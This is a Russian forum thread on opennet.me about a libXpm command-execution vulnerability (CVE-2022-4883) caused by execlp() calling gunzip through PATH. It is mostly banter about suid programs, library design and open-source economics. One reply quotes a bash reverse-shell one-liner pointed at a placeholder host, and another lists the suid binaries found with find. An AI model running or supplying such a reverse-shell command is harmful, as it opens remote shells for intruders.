URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 129569
[ Назад ]

Исходное сообщение
"Уязвимость в libXpm, приводящая к выполнению кода"

Отправлено opennews , 21-Янв-23 11:12 
Опубликован корректирующий выпуск библиотеки libXpm 3.5.15, развиваемой проектом X.Org и применяемой для обработки файлов в формате XPM. В новой версии устранены три уязвимости, две из которых (CVE-2022-46285, CVE-2022-44617) приводят к зацикливанию при обработке специально оформленных файлов XPM. Третья уязвимость (CVE-2022-4883) позволяет запустить произвольные команды при выполнении приложений, использующих libXpm. При запуске связанных с libXpm привилегированных процессов, например, программ с флагом suid root, уязвимость даёт возможность поднять свои привилегии...

Подробнее: https://www.opennet.me/opennews/art.shtml?num=58524


Содержание

Сообщения в этом обсуждении
"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 11:12 
> При запуске связанных с libXpm привилегированных процессов, например, программ с флагом suid root, уязвимость даёт возможность поднять свои привилегии.

Это кто такой умный ставит левым прогам суид-рут?!


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 12:07 
Libxpm классика, которая может всплыть где угодно, раньше вроде в x-сервере использовалась.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 14:12 
И много у тебя троянов внутри суидных прог?

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 00:33 
> Libxpm классика, которая может всплыть где угодно, раньше вроде в x-сервере использовалась.

Вот в какой suid'ной программе она могла бы потребоваться? Даже если забыть о том что в линухе suid уже довольно давно считается "фи" и почти не используется.



"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 16:06 
Ну "почти" не почти, беру первый попавшийся сервер со свежайшим RHEL 9 и все еще вижу сьюды в рута в программах, которые используются постоянно в работающей системе, типа: mount/mount.nfs, unix_chkpwd, at, crontab, su, passwd/gpasswd, fusermount. Впрочем, полагаю что CAP_SETUID, позволяющий сменить uid на рута, это настолько сильная операция, что тут безопасности от отказа от сьюд почти и не будет (хотя какие-то эксплоиты, наверное, предотвратить можно).

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 24-Янв-23 04:19 
> и все еще вижу сьюды в рута в программах, которые используются
> постоянно в работающей системе, типа: mount/mount.nfs, unix_chkpwd, at, crontab,
> su, passwd/gpasswd, fusermount.

И которой из них сабжа надо?


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено dannyD , 21-Янв-23 18:19 
>>Это кто такой умный ставит левым прогам суид-рут?!

а спроси.

ни кто не заметил, что даже если дать
~/.local/share/TelegramDesktop/log.txt root ro, то всё равно он переписывается ?

т.е. при запуске юзверькой прилоги переписываеся файл с доступом только рута.

вот меня это как-то напрягает.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 19:57 
Потому что ты ничего не понимаешь. Права на каталог TelegramDesktop - чьи? Вот чьи права - тот и может удалять-добавлять файлы в этом каталоге. Что такое "переписать"? Старый файл - удаляется, новый - создаётся, обе операции зависят от прав на _каталог_.

Тебе нужен "закрепляющий бит": каталог с установленным sticky-битом означает, что удалить файл из этого каталога может только владелец файла или root. Не забывай, если выше ещё есть каталоги.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено dannyD , 21-Янв-23 20:23 
спс

зы. я не админ, я оффтоп не люблю.
ззы. совсем не люблю.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено dannyD , 22-Янв-23 00:31 
>>Потому что ты ничего не понимаешь.....
>>...нужен "закрепляющий бит": каталог с установленным sticky-битом означает,

а можно чиста каннеретна \../_ _\../

что сделать, чтоб в файле нулевой длины ~/.local/share/TelegramDesktop/log.txt

запускаемая программа (телеграм) ничего не могла записать или измемить?
т.е. задача блокировать ведение этого лога.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Perlovka , 22-Янв-23 13:40 
Гугли setattr

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 24-Янв-23 05:28 
> чтоб в файле нулевой длины ... запускаемая программа (телеграм) ничего не могла

частенько встречается такая задача, погасить неуёмное приложение. Инструменты все озвучены выше: закрепление и рут-владелец (и на группу тоже).


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 25-Янв-23 04:59 
sudo chattr +ai /path/to/file


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 22:37 
> т.е. при запуске юзверькой прилоги переписываеся файл с доступом только рута.

А owner у него кто?

> вот меня это как-то напрягает.

Chattr +i ему поставь. Или если не хочется чтобы там что-то было, можно убрать файло, создать диру с этим именем, и если программа в принципе может после этого работать - ну, ой, в диру дописать что либо она уже не сможет. Получит "Is a directory" как отлуп.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено dannyD , 22-Янв-23 14:08 
спс, разорбрался.

конкретно телеграмм отказывается запускаться с отбитым логом.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено ivan_erohin , 23-Янв-23 17:15 
очень, очень наглый кусок дуровкода.
а если залинковать это в /dev/null:
$ rm -f -- ~/.local/share/TelegramDesktop/log.txt
$ ln -s ~/.local/share/TelegramDesktop/log.txt /dev/null
(и/или то же самое после запуска дуровграма)
что будет ?

ps: man socat вдруг появятся еще идеи.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено dannyD , 23-Янв-23 22:12 
разумеется сслыка будет прибита, а на ёё месте будет новый файл.

PS. это первое, что было испробовано.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено dannyD , 23-Янв-23 22:19 
тоже самое с ~/.xsession-errors от lightdm

лечится ковырянием сырца с переносом в /tmp который на tmpfs


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 24-Янв-23 04:23 
> конкретно телеграмм отказывается запускаться с отбитым логом.

Ггг лол, ну, я бы если пользовался этим крапом вгрузил бы LD_PRELOAD'ом libfxxxoff.so - который так то open() с вон тем аргументом как-бы сделает. Теоретически. Практически, делать что-то с файлами в фс при этом совершенно не обязательно, только имитировать что все прокатило. Можно подумать, оно еще и проверять содержимое будет. Главное грамотно с314ть что все збс :)


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено dannyD , 24-Янв-23 07:48 
нихтфирштейн.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 11:13 
> Атака сводится к размещению в доступном пользователю каталоге, присутствующем в списке PATH, собственных исполняемых файлов

Ну а это вообще жесть :)


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 12:01 
По сути, не отличается от подмены утилиты или библиотеки на левую. Вы обречены.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 14:14 
> не отличается от подмены утилиты или библиотеки на левую

Вот с этого и надо было статью начинать: "сначала надо подменить систему".


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено An onymous , 21-Янв-23 12:43 
warning! Пользователь может запустить под собой какую-то программу!

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 16:34 
Warning. Программа с suid бит может запустить под root какую-то программу вместо gzip

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Admino , 21-Янв-23 18:00 
А что за программа-то?

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено OpenEcho , 21-Янв-23 18:36 
> А что за программа-то?

    bash -i >& /dev/udp/1.2.3.4/1337 0>&1


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Admino , 21-Янв-23 19:38 
С правами рута и с использованием libXpm?

Отсыпь.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено OpenEcho , 23-Янв-23 19:35 
> Отсыпь.

Но, тебе уже и так хватит :)

Но если хочешь чтоб быстрей отпустило, дай доступ на ограниченый экаунт в которм суидишная компроментированная/вулнерабная прожка есть


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Admino , 23-Янв-23 19:45 
Так вот мне и интересно было, где это в дистрибутивах встречается графическая тулза с суидом и libXpm.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено OpenEcho , 25-Янв-23 00:03 
> Так вот мне и интересно было, где это в дистрибутивах встречается графическая
> тулза с суидом и libXpm.

А-а-а, вы о этом, сори, не понял... к сожалению помимо безобидного текстового XPM, есть еще

```
<xmp>

find . -perm /6000
./usr/bin/fusermount3
./usr/bin/wall
./usr/bin/passwd
./usr/bin/newgrp
./usr/bin/gpasswd
./usr/bin/chsh
./usr/bin/su
./usr/bin/expiry
./usr/bin/mount
./usr/bin/umount
./usr/bin/sudo
./usr/bin/mlocate
./usr/bin/chage
./usr/bin/ssh-agent
./usr/bin/write.ul
./usr/bin/dotlockfile
./usr/bin/crontab
./usr/bin/chfn
./usr/sbin/unix_chkpwd
./usr/lib/dbus-1.0/dbus-daemon-launch-helper
./usr/lib/x86_64-linux-gnu/utempter/utempter
./usr/lib/openssh/ssh-keysign
./usr/local/share/fonts
./run/log/journal
./var/log/journal
./var/log/journal/0289d16f3787f03a0475a594054e4e77
./var/mail
./var/local

</xmp>
```


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Admino , 25-Янв-23 00:08 
Зачем ты привёл кучу текстовых утилит, которые к libXpm никаким боком отношения не имеют? Не говоря уже про логи?

Ты ChatGPT, что ли?


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено OpenEcho , 25-Янв-23 19:55 
> Зачем ты привёл кучу текстовых утилит,

Это /usr/bin/passwd текстовая утилита ?

> которые к libXpm никаким боком отношения не имеют?

А мы разве не отошли он libXPM и говорим про программы которые работают под SUID/GUID ?

>Не говоря уже про логи?

Это не логи, это выхлоп от

find . -perm /6000

который в данном случае искал на ванильном дебиане все программы от корня на которых установлен SUID/GUID

> Ты ChatGPT, что ли?

Платить калеки ChatGPT чтоб развлекать местных анонимов?! А вы батенька шутник...


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Admino , 25-Янв-23 20:01 
> Это /usr/bin/passwd текстовая утилита ?

Это троллинг тупостью? Да, /usr/bin/passwd - это текстовая утилита.

> А мы разве не отошли он libXPM и говорим про программы которые
> работают под SUID/GUID ?

Для эксплуатации уязвимости требуется а) программа, использующая libXpm и б) программа, имеющая suid бит.

Условия а) и б) должны выполняться одновременно.

Я таких программ в современном дистрибутиве не нашёл. Теперь ты мне приводишь вывод find, в котором логи и куча консольщины. Зачем?

> Это не логи, это выхлоп от
> find . -perm /6000
> который в данном случае искал на ванильном дебиане все программы от корня
> на которых установлен SUID/GUID

И нашёл логи, потому что там на каталогах SGID.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено OpenEcho , 26-Янв-23 00:28 
> Это троллинг тупостью? Да, /usr/bin/passwd - это текстовая утилита.

О-о-о, понятно, еще один умный пуп, ну-ну  смакуй дальше сам какой ты "умный"


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 12:11 
Ядро - одна большая чёрная дырка. Остальные проги тоже, даже sudo который со времён мамонтов, дырявый до сих пор. ОпенБСД занесли за бэкдоры и дырки, тоже не секрет и очень давно уже.

Ну т.е., вся наша вера в жопарукий-сорс - тлен.. Успокаивает порой лишь что wine хоть работает, и то слава богу, ну хоть одна хорошая новость. Как жить то теперь?


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 12:22 
Без таких нытиков как ты - нормально жить

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено деанон , 21-Янв-23 12:39 
Зуммер узнал, что мир не идеален

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 12:50 
Да откудаж вы рождаетесь то инородные такие, что аж каждый вдох и выдох это уже полноценный вывод.
Кто-то прав, вас уже многова-то..

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 12:41 
Хорошо жить на Винде 11

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Анатолий Цыбин , 21-Янв-23 12:52 
Естественно, ведь на Винде нет дыр. Весь мир знает, что Майкрософт -- это фирма от самого бога, в которой работают трудолюбивейшие как Стаханов и умнейшие как Эйнштейн специалисты. Они любят пользователя и заботятся о нём, поэтому не допущают никаких дыр, никаких уязвимостей в принципе.
Те, кто попадают в рай, являются свидетелями того, что у самого бога стоит Винда.
А кто попадает в ад... Ну, не будем о плохом. =)

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 15:14 
Ну не просто же так в линуксе демоны

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Admino , 21-Янв-23 17:59 
И зомби.

И в винде иконки и службы.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 13:12 
А в стенах камеры ещё.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 22:39 
> Ядро - одна большая чёрная дырка.

Ога, блин, выполняет запросы программ, такое сякое. Если запросы программ не выполнять - знаете как хакеры обломаются?! Кстати это работает. Скажем, у меня есть библа которая заворачивает попытки файлы открывать. Программы очень прикольно обижаются когда им почти ничего открыть не дают. Правда далеко не все их них потом работать согласны.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 00:39 
> Ну т.е., вся наша вера в жопарукий-сорс - тлен.. Успокаивает порой лишь
> что wine хоть работает, и то слава богу,

Так что можно позапускать и виндовые трояны милые сердцу прожженого маздайца? Тут уж кому что.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Ананоним , 21-Янв-23 13:08 
Ну они скоро подарят всяким докерам фичу невозможности пользователю менять переменную PATH. Скажите переменным окружения прощай! Депрекатед!

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 14:17 
Да пусть меняет PATH, сколько влезет. Вопрос в другом: какого фига разрешено недоверенному юзеру запускать что-то оттуда, куда он имеет права на запись? Админ локалхоста забыл про noexec?

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Омномним , 21-Янв-23 15:07 
Да не, ну это херня, у меня другой вопрос: каким образом этот юзер себе suid root-то организует?
А так - ну запускает непривилигерованный юзер что-то, в чём проблема-то? :)

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено GOrilla , 21-Янв-23 16:42 
Как это в чем? А эксплоит запускает тогда что. Шелл хостинги не дают запускать из хоумов.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено InuYasha , 21-Янв-23 13:25 
> при помощи вызова execlp() запускает внешние утилиты

Ну это вообще... смузикод из 80ых что-ли? system("gzip my shit"); А всё потому что нет нормального LinAPI?

Если кто будет возмущаться, я тоже делал exec для всяких костылей, и знаю, что иногда надо, но это грязный хак, и не в проде же )


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 14:19 
> А всё потому что нет нормального LinAPI?

А как ты себе это представляешь в принципе? Абсолютно все утилиты на компе должны идти с lib<util_name>.so и каждая утилита должна линковаться с каждой библиотекой другой утилиты?


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 14:52 
В Винде можно dll связать с другой dll.
В java можно динамически загружать нативные библиотеки.
Почему в libxpm нельзя как то так?

Или просто скопипастить код распаковки в исходный код lixpm и не запускать неизвестно какие исполняемые файлы


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 19:14 
> В java можно динамически загружать нативные библиотеки.

Офигеть, вот это круто! Это dlopen() что-ли?


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 10:40 
System.loadLibrary

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Sw00p aka Jerom , 21-Янв-23 20:38 
ну вон в винде дллки также инжектят разница-то в чем?

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 22:34 
Потому что unix это не винда

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 22:47 
> В Винде можно dll связать с другой dll.

В Linux тоже так можно. И чего?

> В java можно динамически загружать нативные библиотеки.

Да охренеть! В нативных программах, только подумайте, тоже.

> Почему в libxpm нельзя как то так?

При желании можно. Просто видимо авторы были ленивые и это показалось им сложнее чем вон то. А чо, в винде тоже можно CreateProcess* сделать из либы если захотеть.

> Или просто скопипастить код распаковки в исходный код lixpm и не запускать
> неизвестно какие исполняемые файлы

Справедливости ради - найти программу которую еще и огреть вон тем удастся придется постараться.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено InuYasha , 21-Янв-23 14:55 
В идеальном мире - примерно да. Функции, алгоритмы, код - в ДЛЛках, CLI и фронтенд - на чём хочешь. А если вспомнить rundll32, то, с натяжкой, КЛИ у нас уже готов... )
Конкретно по сабжу - я реально удивлён что там не подключили какую-нибудь библиотеку.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 17:13 
В данном случае распаковка не является задачей libXpm. Программа может напрямую вызвать zlib, и разжатые данные передать libXpm

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 22:45 
В полноценных операционных системах еще с 90х годов у каждой программы нужные библиотеки лежат в каталоге с этой самой программой и только общесистемные лежат в каталоге операционной системы, где-нибудь в C:\OS2\DLL или C:\Windows\System32.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено InuYasha , 21-Янв-23 13:30 
Гос.пади, xpm - это битмапы в формате сишного массива что-ли? JSON и смузихлёбство из прошлого века? Всю жизнь его ненавидел. Зато проприетарасты его обожают.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 14:20 
И я его обожаю. В CDE божественные xpm'ные иконки

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 09:47 
А если бы они были png'шные, было бы не то?

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 13:32 
ощущения не те

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 14:24 
Дело не в xpm, а что тебе кто-то может ls, например, подменить, а ты потом sudo ls сделаешь (это так, для наглядности, про что "уязвимость").

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено InuYasha , 21-Янв-23 14:51 
Да это-то понятно. Просто вспомнил, что xpm такое. Пока у тебя диск завален xpm-ками - это всё смешно, а, вот, когда у тебя бинарники со вSHITыми в виде данных (а не, хотя бы, ресурсов) картинками - вообще грусть. Особенно если это прошивки какие-нибудь.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 14:42 
>Уязвимость вызвана особенностью работы libXpm со сжатыми файлами XPM - при обработке файлов XPM.Z или XPM.gz библиотека при помощи вызова execlp() запускает внешние утилиты распаковки (uncompress или gunzip)

Очень хорошая архитектура, настоящие программисты на си, превзошли сами себя


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 15:07 
Хотя я тоже писала код запускающий внешний исполняемый файл для ковертации, который в прод работает.
Но там ни путь ни параметры от пользователя не приходят.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 18:05 
> Очень хорошая архитектура, настоящие программисты на си, превзошли сами себя

А что не так? У вас там в расте особенности работы с памятью, а у нас особенность работы с libXpm


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 22:40 
> Очень хорошая архитектура

Верно, классическая UNIX, позволяет менять алгоритм сжатия без изменения кода приложения и перекомпиляции.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 10:36 
Менять алгоритм сжатия на запуск произвольного кода?

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено kusb , 23-Янв-23 14:43 
Может быть истинно понятная и безопасная ОС и должна так работать, без всяких шуток.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 14:44 
>запускает внешние утилиты распаковки (uncompress или gunzip)

Вон из профессии за такое решение.

>Уязвимость устранена заменой вызова execlp на execl с использованием абсолютных путей к утилитам

Вон из профессии за такой фикс.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 15:28 
А если бы они использовали другой язык проблем было бы ещё больше. В том числе с программистами и их решениями.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 16:27 
Какой нахрен другой язык, им дали zlib - нет "хочу дёргать exec". Необучаемые.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 23:34 
Положить zlib.so в PATH. Повторить эксперимент

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 23:36 
ldconfig использует $PATH?

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 22:41 
Давай tar ещё выгони, дурик.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 10:47 
tar давно ффтопку, ибо его разрабы не понимают в архитектуре и делали его абы-как и в результате он выглядит как неудобное в использовании нагромождение говна. Рано или поздно всё это говно придётся разгребать и делать по-человечески. Только почему опять мне?

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Омномним , 21-Янв-23 15:03 
при обработке файлов XPM.Z или XPM.gz библиотека при помощи вызова execlp() запускает внешние утилиты распаковки

А libz поюзать вообще не судьба была?


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 15:11 
Ну, тогда бы сейчас бы читали новость об очередном переполнении int и выходы за пределы буфера.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 15:29 
Выходить? Не надо так.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Омномним , 24-Янв-23 00:11 
Пока что только новость о выходе за пределы сознания.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Анонн , 21-Янв-23 16:15 
Офигенный код и офигенный фикс...
Кто там пыхеров и жсников за eval ругал? Ваш выход!

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 17:12 
В это проблема GNU/Xorg библиотек. Десятки тысяч исходных кодов, которые не верифицировались и не обновлялись на протяжении, например 11 лет! 20 лет! да там есть и такое.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 10:48 
У вейланда другая проблема - падает и глючит.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 23-Янв-23 13:08 
>GNU/Xorg

Конечно, FSF был бы не против этого.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 17:09 
А ведь можно было использовать библиотеки реализующие декомпрессию z/gz и не вызывать в коде библиотеки (библиотеки!!) внешние исполняемые файлы.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 21:10 
Юникс вэй. Утилита > утилита > утилита.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 22:47 
Утилита > утилита > утилита > You're pwned

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 22:11 
Блеск и нищета опенсорса.

Врачи пишут планировщики задач, студни и всякие бoмжы пишут свои утилитки "лишь бы работало", потом приходят другие и лепят на основе этих поделок что-то свое, потом это слепливают в большой дурнопахнущий ком и выкладывают в прод.

А потом оказывается что пол инета зависит от стремной либы, автор которой давно на нее забил, которая никогда не ревьювилась и не обновлялась уже годы...

Колосс на глиняных ногах!


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 22:17 
Зато в ынтерпрайзе всё не так. Сеньёры молятся на новые версии библиотек и дают по рукам джунам, которые делают свои! :D

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 22:40 
В ынтерплайзе никто не будет писать либу просто так. По крайней мере в рабочее время.

Еще забыл про основной аргумент за опенсорс - бесплатность.

Спросишь 'Чем этот фоторедактор лучше чем стандарт индустрии?'
- 'Он же бесплатный!' ответят тебе.
- 'Но он же кривой, косой и багованый!'
- 'Зато бесплатный!'
Ох, это сладкое слово халява!

Те кто будут писать что проприетарный софт тоже ничего не должен - вы явно не доросли до SLA)))


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 22:42 
Свободный и бесплатный это разные вещи.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 22:59 
А я и не утверждал, что это одинаковые вещи.
Просто настоящих идейных крайне мало, но они хоть вызывают уважение.

Но большинство пользователей опенсорца интересует только аспект бесплатности.
Они просто качают ибо халява, крайне редко куда-то донатят и еще реже делают вклад написание кода/ревью/тестированием/дизайном. Подавляющему большинству даже лень багрепорты отправлять.

И единственный их вклад в развитие опенсорс - рассказать другу 'о, я тут беспланую аппу скачал!'


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 23:09 
Это же все видно.
Посмотрите сколько пользователей у того же firefox, и сколько у них было донатов от 'физлиц' И заодно кол-во контрибьюторов в их репы.
Или у LibreOffice? Или GIMP?
Каждый сотый? Каждый тысячный? Или все еще хуже?

Людям как-то объяснили про бесплатность опенсорса, а про то что за свободу нужно платить - нет.

В итоге развивается только во что вложились корпорации. А пользователи ноют 'праклятые карпарасты испортили мой опенсорс'
Да он никогда их и не был!


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Бывалый смузихлёб , 22-Янв-23 05:26 
> за свободу нужно платить - нет

Свобода, за которую надо платить - это платная временная вольная от хозяина

По корпорациям и прочему - почему-то тот же опенсорс и его адептов вовсе не смущает, что абсолютное большинство на его благо трудится за доброе слово даже без прав на собственный код( а то и за пинок под жО за несоблюдение кок’ов )

Что вовсе не мешает руководству тех структур за счёт добровольных пожертвований платить самим себе зарплату и почти непрерывно кататься по всему миру и закатывать балы-пиры разумеется в рамках популяризации попенсорса вместо денежной поддержки участников.
Даже не зарплатных а хотя бы уровня выплаты за годную фичу. Даже полтишок - мелочь, а приятно.

В общем, уверен ли анон-знаток-всего-на-свете, что донаты идут именно на работу над продуктом и что за всю работу над проектом сама контора платит конечным разработчикам ?
Ну, чтобы иметь хоть какое-то минимальное право требовать денег за фичи


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 09:16 
> абсолютное большинство на его благо трудится за доброе слово

А потому что это не правда.

'The number of unpaid developers may be stabilizing, with these developers contributing 8.2% of contributions'
Источник: Annual Kernel Development Report
2017.
Это при том что в 2014 было 11.8%. А после ковида думаю их стало еще меньше, но цифры искать лень.

Т.е. абсолютное большинство трудится за хрустящую бумажку корпораций, а не за доброе слово.
И делать они будут то что им скажет корпоративный менеджер (за редким исключением супер крутых и распиаренных чуваков)

Более того, если глянуть другие отчеты, то там тоже куча всего интересного.
Напр. из '2022 Linux Foundation Annual Report' секция MENTORSHIP
- 70% чуваков из Индии
- 62% чуваков с не законченным колледжом и 23% с законченным
- High school или master degree есть только у 7.6% и 4.1% соответственно
- 52.9% это lower middle class (которые скорее всего надеятся найти работу в каком-то intel/ibm/redhat...)
В это будущее линукса)))


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 09:28 
> платить самим себе зарплату

А потому что они копируют корпоративную структуру от которой и получают деньги.
Поэтому и какая-то глава мозилы выплачивала себе миллионы баксов, прям как в фирмах выплачивают золотые парашюты.

Но нас вроде это парить не должно, это ж практические все деньги гугла?

> донаты идут именно на работу над продуктом и что за всю работу над проектом сама контора платит конечным разработчикам

Разумеется я этого не могу гарантировать. Более того, сейчас, думаю, они будут просыраться на банкеты и всякое дайверсити.

Просто обычные пользователи уже проиграли. Опенсорс нашел свой путь развития в видеслияния с корпами и будет отрабатывать их хотелки.
А пользователи могут только ныть на форумах про очередной системД, никак не влияя на направление развития продукта.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 09:50 
Раньше на сайте Криты писалась сумма пожертвований. Потом вроде убрали, чтобы не позориться.

"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 23:35 
> никто не будет писать либу просто так

дык за деньги же

в отечественном ынтерпрайзе токо и делают, что используют бесплатные либы. а кто считает, что это не так, тот явно не дорос


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 21-Янв-23 23:46 
>В ынтерплайзе никто не будет писать либу просто так

АХАХАХАХА


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 00:41 
> Те кто будут писать что проприетарный софт тоже ничего не должен -
> вы явно не доросли до SLA)))

Однако в лицензиях проприетарного софта почему-то написано про AS IS. Да, некоторые еще и читают это.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Аноним , 22-Янв-23 00:50 
> В ынтерплайзе никто не будет писать либу просто так

То-то у "ынтерплайза" сейчас версионная диарея.


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено Бывалый смузихлёб , 22-Янв-23 05:31 
> В ынтерплайзе никто не будет писать либу просто так.
> По крайней мере в рабочее время.

Ну почему же, вполне будет.
Только если это не согласовано с конторой, либо будут разборки о том кому код принадлежит, либо - сколько штрафа должен заплатить сотрудник за неисполнение обязанностей( т.е что на работе занимался не работой а черти чем, но зарплату ему платили будто бы он работал )


"Уязвимость в libXpm, приводящая к выполнению кода"
Отправлено хрю , 22-Янв-23 14:23 
>>В ынтерплайзе никто не будет писать либу просто так.

